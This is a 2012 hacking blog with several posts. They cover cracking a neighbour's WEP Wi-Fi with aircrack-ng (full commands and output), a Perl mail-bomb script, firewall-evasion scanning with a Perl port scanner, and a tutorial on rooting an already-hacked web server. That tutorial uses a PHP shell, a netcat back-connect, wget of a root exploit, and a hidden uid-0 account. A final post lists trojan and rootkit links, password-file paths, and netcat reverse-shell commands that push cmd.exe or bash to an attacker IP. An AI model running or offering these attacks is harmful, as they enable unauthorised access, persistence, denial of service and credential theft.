Sunday, 25 March 2012

Cracking WEP with aircrack-ng

So i'll have to apologize for a severe lack of posts, i just moved from Texas to Northern VA and its been hell finding a place to rent. We finally found a place but the cable man doesnt come till monday, now that wont do i need my net fix. thankfully there are plenty of wifi networks i can see from inside the house...


######################
# Step 1: Target a specific network #
######################

root@segfault:/home/cg/eric-g# airodump-ng --bssid 00:18:F8:F4:CF:E4 -c 9 ath2 -w eric-g
CH 9 ][ Elapsed: 4 mins ][ 2007-11-21 23:08

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:18:F8:F4:CF:E4 21 21 2428 26251 0 9 48 WEP WEP OPN eric-G

BSSID STATION PWR Lost Packets Probes

00:18:F8:F4:CF:E4 06:19:7E:8E:72:87 23 0 34189

###########################
# Step 2: Associate with the target network #
###########################

root@segfault:/home/cg/eric-g# aireplay-ng -1 600 -e eric-G -a 00:18:F8:F4:CF:E4 -h 06:19:7E:8E:72:87 ath2
22:53:23 Waiting for beacon frame (BSSID: 00:18:F8:F4:CF:E4)
22:53:23 Sending Authentication Request
22:53:23 Authentication successful
22:53:23 Sending Association Request
22:53:24 Association successful :-)
22:53:39 Sending keep-alive packet
22:53:54 Sending keep-alive packet
22:54:09 Sending keep-alive packet
22:54:24 Sending keep-alive packet
22:54:39 Sending keep-alive packet
22:54:54 Sending keep-alive packet
22:55:09 Sending keep-alive packet
22:55:24 Sending keep-alive packet
22:55:39 Sending keep-alive packet
22:55:54 Sending keep-alive packet
22:55:54 Got a deauthentication packet!
22:55:57 Sending Authentication Request
22:55:59 Sending Authentication Request
22:55:59 Authentication successful
22:55:59 Sending Association Request
22:55:59 Association successful :-)
22:56:14 Sending keep-alive packet

***KEEP THAT RUNNING


####################
# Step 3: Generate Key Stream #
####################

root@segfault:/home/cg/eric-g# aireplay-ng -5 -b 00:18:F8:F4:CF:E4 -h 06:19:7E:8E:72:87 ath2
22:59:41 Waiting for a data packet...
Read 873 packets...

Size: 352, FromDS: 1, ToDS: 0 (WEP)

BSSID = 00:18:F8:F4:CF:E4
Dest. MAC = 01:00:5E:7F:FF:FA
Source MAC = 00:18:F8:F4:CF:E2

0x0000: 0842 0000 0100 5e7f fffa 0018 f8f4 cfe4 .B....^........
0x0010: 0018 f8f4 cfe2 c0b5 121a 4600 0e18 0f3d ..........F....=
0x0020: bd80 8c41 de34 0437 8d2d c97f 2447 3d81 ...A.4.7.-.$G=.
0x0030: 9bdc 68da 06b2 18be 9cd6 9cb4 9443 8725 ..h..........C.%
0x0040: 87f6 9a14 1ff9 0cfa bd36 862e ec54 7215 .........6...Tr.
0x0050: 335b 4a91 d6a4 caae 5a58 a736 6230 87d9 3[J.....ZX.6b0..
0x0060: 4e14 7617 21c6 eda4 9b0d 3a00 0b4f 47ab N.v.!.....:..OG.
0x0070: a529 dedf 4c13 880c a1e6 37f7 50e6 599c .)..L.....7.P.Y.
0x0080: 0a4c 0b7f 24ae b019 ef2f 36b9 c499 8643 .L.$..../6....C
0x0090: 6592 5835 23e5 c8e9 d1b9 3d36 1fe5 ecfe e.X5#.....=6....
0x00a0: 510b 51ba 4fe4 e2ed d33b 0459 ca68 82b8 Q.Q.O....;.Y.h..
0x00b0: c856 ea70 829f c753 1614 290e d051 392f .V.p...S..)..Q9/
0x00c0: fa65 cbc6 c5f8 24b1 cdbd 94e5 08c3 2dd4 .e....$.......-.
0x00d0: 6e4b 983b dc82 b2cd b3f1 dab5 b816 6188 nK.;..........a.
--- CUT ---

Use this packet ? y

Saving chosen packet in replay_src-1121-230028.cap
23:00:38 Data packet found!
23:00:38 Sending fragmented packet
23:00:38 Got RELAYED packet!!
23:00:38 Thats our ARP packet!
23:00:38 Trying to get 384 bytes of a keystream
23:00:38 Got RELAYED packet!!
23:00:38 Thats our ARP packet!
23:00:38 Trying to get 1500 bytes of a keystream
23:00:38 Got RELAYED packet!!
23:00:38 Thats our ARP packet!
Saving keystream in fragment-1121-230038.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream


######################
# Step 4: Build a valid ARP Packet #
######################

root@segfault:/home/cg/eric-g# packetforge-ng -0 -a 00:18:F8:F4:CF:E4 -h 06:19:7E:8E:72:87 -k 255.255.255.255 -l 255.255.255.255 -w arp -y *.xor
Wrote packet to: arp


#########################
# Step 5: Generate your own arp traffic #
#########################

root@segfault:/home/cg/eric-g# aireplay-ng -2 -r arp -x 150 ath2

Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = 00:18:F8:F4:CF:E4
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 06:19:7E:8E:72:87

0x0000: 0841 0201 0018 f8f4 cfe4 0619 7e8e 7287 .A..........~.r.
0x0010: ffff ffff ffff 8001 1f1a 4600 c9d3 e5e7 ..........F.....
0x0020: d65a 6a63 0b51 bb60 8390 a8b4 947d 456f .Zjc.Q.`.....}Eo
0x0030: 3a05 25b2 7464 7db7 c49b d38a f789 822c :.%.td}........,
0x0040: 83a8 93c5 ....

Use this packet ? y

Saving chosen packet in replay_src-1121-230224.cap
You should also start airodump-ng to capture replies. **we started airodump on step1


at this point your airodump capture should really be filling up with a ton of data packets as we do the arp replay attack


################
# Step 6: Start cracking #
################


we can run aircrack while the arp replay attack is ongoing, so you dont have to stop the arp replay or fake authentication sessions.

cg@segfault:~/eric-g$ aircrack-ng -z eric-g-05.cap
Opening eric-g-05.cap
Read 64282 packets.

# BSSID ESSID Encryption

1 00:18:F8:F4:CF:E4 eric-G WEP (21102 IVs)

Choosing first network as target.

Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 21397 ivs.

Aircrack-ng 0.9.1


[00:00:11] Tested 78120/140000 keys (got 22918 IVs)

KB depth byte(vote)
0 3/ 5 34( 111) 70( 109) 42( 107) 2C( 106) B9( 106) E3( 106)
1 1/ 14 34( 115) 92( 110) 35( 109) 53( 109) 33( 108) CD( 107)
2 6/ 18 91( 114) E7( 114) 21( 111) 0E( 110) 88( 109) C6( 109)
3 2/ 31 37( 109) 80( 109) 5F( 108) 92( 108) 9E( 108) 9B( 107)
4 0/ 2 29( 129) 55( 114) AD( 112) 6A( 111) BB( 110) C1( 110)

KEY FOUND! [ 70:34:91:37:29 ]
Decrypted correctly: 100%

Wednesday, 21 March 2012

Mass MailBombing

It is the mail bombing attack wherein the attack flood  the victim's e-mail account with extremely large number of copies of the same Email

perl script for mass mail bombing

---------------------------------------------------------------------------------------------------------------
#!/bin/perl
$mprogram= '/usr/lib/sendmail';                                          //path of the email demon 
$victim= 'victime@hostname.com';                                    // Victim's email address
$var=0;                                                                                  //start count from 0

while($var<10000)                                                              //count till number of email to be sent 

{
open(MAIL, "|$mprogram $victim"}||die "can't open mail program\n";
print MAIL "MAIL Bomb" ;                                                  //Enter E-mail counts here and send e-mail
close(MAIL);
sleep(5);                                                                               // wait for some time 
$var++;                                                                                  //increase count by 1
}
---------------------------------------------------------------------------------------------------------------

 this perl script will send 10000 copies of the same email message to the victim (victime@hostname.com).it is important to note here that the above piece of code can easily to be modified to change the number of copies to send ,the victims or the content of mailbomb. 



Saturday, 17 March 2012

Scanning Through firewalls

Don't worry, this section is not going to give the script kiddies some magical technique to render your firewalls ineffective. Instead, we will cover a number of techniques for dancing around firewalls and gather some critical information about the various paths through and around them

---------------------------
Raw Packet Transmissions
---------------------------

hping, by Salvatore Sanfilippo (http://www.hping.org), works by sending ICMP, TCP (default mode), or UDP packets to a destination system/port and reporting the packets it gets back. hping returns a variety of responses depending on numerous conditions. Each packet in part or in whole can provide a fairly clear picture of the firewall's access controls. For example, by using hping, we can discover open, blocked, dropped, and rejected packets.
In the following example, hping reports that port 80 is open and ready to receive a connection. We know this because it received a packet with the SA flag set (a SYN/ACK packet).

[root]# hping2 192.168.0.2 -S -p 80 -n
HPING www.example.com (eth0 172.16.1.20): S set, 40 data bytes
60 bytes from 192.168.0.2: flags=SA seq=0 ttl=242 id=65121 win=64240 time=144.4 ms
 
Now we know an open port exists on our target, but we don't know where the firewall is yet. In our next example, hping reports receiving an ICMP unreachable type 13 packet from 192.168.70.2. In Chapter 2, you learned that ICMP type 13 is an ICMP Admin Prohibited Filter packet, which is usually sent from a packet-filtering router such as Cisco's IOS.
[root]# hping2 192.168.0.2 -S -p 23 -n
HPING 192.168.0.2 (eth0 172.16.1.20): S set, 40 data bytes
ICMP Unreachable type 13 from 192.168.0.1 
 
Now it is confirmed: 192.168.70.2 is most likely our firewall, and we know it is explicitly blocking port 23 to our target. In other words, if the system is a Cisco router, it probably has a line like the following in its config file:
access-list 101 deny tcp any any 23 ! telnet
In the next example, we receive an RST/ACK packet back, signifying one of two things: either that the packet got through the firewall and the host is not listening to that port, or that the firewall rejected the packet (such is the case with Check Point's reject rule).

[root]# hping2 192.168.0.2 -S -p 22 -n
HPING 192.168.0.2 (eth0 172.16.1.20): S set, 40 data bytes
60 bytes from 192.168.0.2: flags=RA seq=0 ttl=59 id=0 win=0 time=0.3 ms
 
Because we received the ICMP type 13 packet earlier, we can deduce that the firewall (192.168.0.1) is allowing our packet through, but the host is just not listening on that port.
If the firewall you're scanning through is Check Point, hping will report the source IP address of the target, but the packet is really being sent from the external NIC of the Check Point firewall. The tricky thing about Check Point is that it will respond for its internal systems, sending a response and spoofing the target's address. When attackers hit one of these conditions over the Internet, however, they'll never know the difference, because the MAC address will never reach their machine (to tip them off).
Finally, when a firewall is blocking packets altogether to a port, you'll often receive nothing back:


[root]#hping 192.168.50.3 -S -p 22 -n
HPING 192.168.50.3 (eth0 192.168.50.3): S set, 40 data bytes
 
In this scenario, the hping result can have two meanings: the packet couldn't reach the destination and was lost on the wire, or the target host was not turned off (it may not exist) or, more likely, a device (probably our firewall, 192.168.70.2) dropped the packet on the floor as part of its ACL rules.

 

Raw Packet Transmissions Countermeasure

Preventing an hping attack is difficult. Your best bet is to simply block ICMP type 13 messages (as discussed in the preceding nmap scanning prevention section).


Firewalk

Firewalk (http://www.packetfactory.net/projects/firewalk) is a nifty little tool that, like a port scanner, will discover ports open behind a firewall. Written by Mike Schiffman (a.k.a. Route) and Dave Goldsmith, the utility will scan a host downstream from a firewall and report back the rules allowed to that host, without actually touching the target system.
Firewalk works by constructing packets with an IP TTL calculated to expire one hop past the firewall. The theory is that if the packet is allowed by the firewall, it will be allowed to pass and will expire as expected, eliciting an "ICMP TTL expired in transit" message. On the other hand, if the packet is blocked by the firewall's ACL, it will be dropped, and either no response will be sent or an ICMP type 13 Admin Prohibited Filter packet will be sent. The following scenario assumes that ports 135 through 138 and 140 are open behind the firewall.

[root]#firewalk -pTCP -S135-140 10.22.3.1
192.168.1.1
Ramping up hopcounts to binding host...
probe:  1  TTL:  1  port 33434:  expired from [exposed.example.com]
probe:  2  TTL:  2  port 33434:  expired from [rtr.isp.net]
probe:  3  TTL:  3  port 33434:  Bound scan at 3 hops [rtr.isp.net]
port 135: open
port 136: open
port 137: open
port 138: open
port 139: *
port 140: open
 
The only problem we've seen when using Firewalk is that it can be highly unpredictable, because some firewalls will detect that the packet expires before checking their ACLs and send back an "ICMP TTL expired" packet anyway. As a result, Firewalk often assumes that all ports are open.

Firewalk Countermeasure

You can block "ICMP TTL expired" packets at the external interface level, but this may negatively affect its performance, because legitimate clients connecting will never know what happened to their connection.

Source Port Scanning

Traditional packet-filtering firewalls such as Cisco's IOS have one major drawback: They don't keep state! For many of you that seems obvious, right? But think about it for a moment. If the firewall cannot maintain state, it cannot tell whether the connection began outside or inside the firewall. In other words, it cannot completely control some transmissions. As a result, we can set our source port to typically allowed ports such as TCP 53 (zone transfers) and TCP 20 (FTP data) and then scan (or attack) to our heart's content.
To discover whether a firewall allows scans through a source port of 20 (FTP-data channel, for example), you can use nmap's -g feature:

nmap -S -P0 -g 20 -p 139 10.1.1.1

Note 
You'll need to use the SYN or half-scan technique when using the static source port feature of nmap.
If ports come back as open, you will likely have a vulnerable firewall in your midst. To understand the scenario better, here's a diagram that details how the attack works:


 

You can now take advantage of the discovery that a firewall is not maintaining the state of its firewalled connections by launching attacks against vulnerable systems behind the firewall. Using a modified port redirector such as Fpipe from Foundstone, you can set the source port to 20 and then run exploit after exploit through the firewall. In addition, you can use the ever-popular netcat (http://netcat.sourceforge.net) to set your source port to 20 and then connect to open ports behind the firewall. Use the -s option to set your source port. As we have discussed in earlier chapters, netcat is your friend!

Source Port Scanning Countermeasure

The solutions to this vulnerability are simple but not all that glamorous. You'll need to either disable any communications that require more than one port combination (such as traditional FTP), switch to a stateful or application-based proxy firewall that keeps better control of incoming and outgoing connections, or employ firewall-friendly applications such as Passive FTP that do not violate the firewall rules.

Port scaner using perl

#!/usr/bin/perl
# Perl Port Scanner
# Sh3llc0d3
use IO::Socket;

if(@ARGV != 3){
    print "Sh3llc0d3\n";
    print "Learn how to use this!!!\n";
    print "$0 [start port] [end port] [host]\n";
        print "Example: $0 1 65535 127.0.0.1\n";
    exit 1;
}
if($ARGV[0] > $ARGV[1]){
    print "The Start port is higher then End port: Sort it out!\n";
    exit 1;
}
for($i = $ARGV[0]; $i <= $ARGV[1]; ++$i){
    $host = new IO::Socket::INET(
        PeerAddr => $ARGV[2],
        PeerPort => $i,
        Proto => 'tcp',
        Timeout => 1
    );
    if($host){
        print "Port $i is OPEN\n";
    } else {
        print "Port $i is CLOSED\n";
    }
}
exit;

Monday, 5 March 2012

Server Rooting Tutorial and Adding New Root User


















welcome to a tutorial on how to root a linux server.
This is going to be short,HQ tutorial with pictures included (For better learining)

So let's start with things you will need:
  • 1) Shelled website
  • 2) Local root exploit
  • 3) NetCat

Chapter 1 - Gathering informations

Open up your .php shell on a hacked webserver.
I have mine for an example

Now you need to check what kernel your slave is using...
It should be something like 

Linux somerandomhosting.com 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686

Next thing you wanna do is to look for an local root exploit.
From example provided mine one is 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686.


Here's the list of exploits
http://pastebin.com/A0sUhhrz

NOTE: If your webserver have 2.6.18 2011 kernel,then you have 0.0001% chances that you will root it,because there's no public exploit for that version.


Chapter 2 - Backconnecting to the server
For this you will need:

1) NetCat
2) Open port (Example. 443 I won't teach how to port forward,use Google if you don't know how!!)

So open your netcat and type:
-l -n -v -p 443
Hit "Enter"

Now it should write "listening on [any] 443 ..."
Good.
Go back to your shell and go to "BackConnect function"
Many shells have it.
Enter your port and press "Connect".
 

Now it should connect to your netcat 
I got something like this
 


Chapter 3 - Downloading exploit and executing it
Now we will need our exploit from Chapter 1
There's 2 way of uploading:

1) Using shell uploader
2) Using 'wget' function (Requires backconnection)

I'm going to use 'wget' function because it's easier and faster.
So copy your exploit link (Mine one http://localroot.th3-0utl4ws.com/xploits...8-164.zip) and go back to your netcat and type:


Now it downloaded out exploit named "2.6.18-164.zip" on our server.

If your exploit is downloaded as anyrandomname.c you must compile it
Do do that first download that exploit and then type:

gcc anyrandomname.c -o anyrandomname
And our exploit is compiled. (If you get errors when compiling then find another exploit
  
If you downloaded your exploit in zip file anyrandomname.zip type:

unzip anyrandomname.zip


Now you should have your exploit (Like mine "2.6.18-164")

If you completed all steps it's time to get root.

Type:

chmod 777 yourexploit'sname
With common sense where i typed "yourexploit'sname" you will type your exploit's name.

And one last final step is to run our exploit
./yourexploit'sname

To check if you got root type
id
or
whoami

Mine steps to root

 

Chapter 4 - Adding root user
Adding new root user is fairly easy
We use this command:
adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M root2

Command explanations:
Quote:adduser - Using Linux adduser command to create a new user account or to update default new user information.

-u 0 -o - Set the value of user id to 0.

-g 0 - Set the initial group number or name to 0

-G 0,1,2,3,4,6,10 - Set supplementary group to:
0 = root
1 = bin
2 = daemon
3 = sys
4 = adm
6 = disk
10 = wheel

-M - 'home directory' not created for the user.

root2 - User name of the new user account.NOTE: Change root2 to your desired username.

Now you need to set a password for your username.
Type in next:
passwd Root2

(Root2 is your username)

See an example

[root@fedora ~]# passwd root2
Changing password for user root2.
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully.

To check if you did alright

id root2
(Root2 is your username)




 GNY shell - http://www.4shared.com/office/jLmzLh83/GNYShell.html
Google - http://google.com
NetCat - http://downloadnetcat.com/nc11nt.zip

So that concluded our rooting tutorial.
I hope that someone will learn from this and that this thread will be bookmarked for generations

Sunday, 4 March 2012

Remote Command Shell/Remote Access Trojans/Rootkits

Sub7 Trojan                                           http://sub7.net/
Barok active Trojan                             http://www.thenewbiesarea.com/trojans.shtml
AckCmd backdoor                               http://ntsecurity.nu/toolbox/
Tini backdoor                                        http://ntsecurity.nu/toolbox/
Psexec r-shell                                        http://www.sysinternals.com/ntw2k/freeware/psexec.shtml
Rwwwshell r-shell                                http://www.thc.org/releases/rwwwshell-2.0.pl.gz
LRK5 rootkit                                          http://www.hackersplayground.org/tools.html
Knark 2.4 rootkit                                   http://www.hackersplayground.org/tools.html

PASSWORD AND LOG FILE LOCATIONS

Here is a brief list of a few important file locations on different systems.
--------------------
Windows
--------------------
Password (Sam) file:
C:\WINDOWS\system32\config\sam
HKEY_LOCAL_MACHINE\SAM
C:\WINDOWS\system32repair\sam

System Event Log:
C:\WINDOWS\system32\config\SysEvent.Evt

Security Event Log:
C:\WINDOWS\system32\config\SecEvent.Evt

Configuration Event Log:
C:\WINDOWS\system32\config\AppEvent.Evt

-----------
UNIX
---------
Password file common locations:
/etc/passwd, /etc/shadow, /.secure/etc/passwd, /etc/smbpasswd,
/etc/nis/passwd, /etc/master.passwd, /etc/security/passwd
Log files:
/user_account/.bash_history, /var/ (files: utmp, wtmp, messages,
secure, xferlog, maillog, lastlog), /var/log

----------
VNC
------------
Windows password storage:
HKEY_USURS\.DEFAULT\SOFTWARE\ORL\WinVNC3\Password

UNIX password storage:
$HOME/.vnc/passwd

Netcat Remote Shell Commands


nc -L -d -e c :\winnt\system32\cmd.exe -p 1255 Run onthe listening machine (target), this will send back a Windows command shell when connected on port 1255. The L switch keeps a persistent listener running, and the D switch sets no interactive console. To connect to the target machine you would run: nc target IP address 1255. Remember that netcat must be located in the \system32 of the target machine in order to execute cmd.exe. You may also need to put in the full path to cmd.exe, such as c:\winnt\system32\cmd.exe.

nc attacker IP address 80 -e c:\winnt\system32\cmd.exe (or /usr/bin/bash) Run this on the target machine to have netcat execute a command shell and send the shell out port 80 to the attacking system. The attacking system has netcat listening on ports 80 (nc -v -l -p 80).

nc attacker IP address 25 | cmd.exe | nc attacker IP address 53 (or /bin/bash instead of cmd.exe) Run this on the target machine to have two netcat sessions started for issuing commands and piping the output and executing a command shell to the attacking system. The attacking system should have netcat listening on ports 25 and 53 (nc -v -l -p 25/53). The attacker will issue commands on the port 25 session and receive the output on the port 53 session. Aswith the previous instance, netcat must be in the same directory as cmd.exe. Another twist on this remote shell shoveling theme is to use Telnet instead of netcat in the command example above.

Netcat cheat-sheet (advance hacking with Netcat)                                                                              
----------------------------------------------------
http://h.ackack.net/cheatsheets/netcat 
-----------------------------------------------------
 
Getting a command shell back from a compromised system can be tricky. Remember that you can either connect to the target and have it respond with a shell or execute a command and have the shell “shoveled” back out to you. Also, you have such things as ftp, tftp, and http possibly available on the target that you can make use of in order to get necessary files back to the target. You can also try running the server part of these either on the target or the attacking machine in either a “push” or “pull” fashion. Don’t forget tools such as fpipe, WinRelay, and Zebedee for port forwarding and redirecting, either. Links to those can be found in the last section, “Must-Have Free (or Low-Cost) Tools.”